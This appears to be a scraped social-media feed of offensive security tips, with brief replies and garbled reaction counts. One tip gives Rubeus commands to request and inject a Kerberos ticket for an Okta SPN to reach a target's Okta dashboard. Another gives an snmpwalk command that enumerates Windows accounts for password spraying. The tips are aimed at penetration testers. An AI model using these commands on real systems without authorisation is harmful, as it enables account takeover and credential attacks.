Red Teamers: If your target is using Okta (check <orgname>.okta.com), pull a TGS for the SPN HTTP/<orgname>.kerberos.okta.com and inject it into your host session. When proxied, this will allow you to access their Okta dashboard.
Rubeus asktgs /spn:<spn>
Rubeus ptt /ticket:<ticket>
07.04.2025 15:33
π 1
π 1
π¬ 1
π 0
Yupp
25.03.2025 13:36
π 1
π 0
π¬ 0
π 0
βπ»π
17.03.2025 11:32
π 1
π 0
π¬ 1
π 0
Yesβ¦! This is enough for me
17.03.2025 09:03
π 1
π 0
π¬ 0
π 0
β€οΈ
17.03.2025 06:29
π 1
π 0
π¬ 0
π 0
Right side armyβ¦
Assemble!
17.03.2025 06:24
π 3
π 0
π¬ 0
π 0
As a reminder, my "red team tips" found both on this and where I used to post them (the Nazi app) are not necessarily tips specifically for adversary emulators; they are generalized offensive tips useful to both penetration testers and red teamers. "Red team" is shorthand here!
24.01.2025 17:28
π 7
π 1
π¬ 1
π 0
Red Teamers: do NOT neglect SNMP like sysadmins usually do! SO many networks have granted me very quick wins through SNMP enumeration, which can be done with Metasploit, snmpwalk, and onesixtyone:
Enum Windows accounts (spray?):
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
#hacking #redteam
24.01.2025 17:33
π 17
π 4
π¬ 0
π 0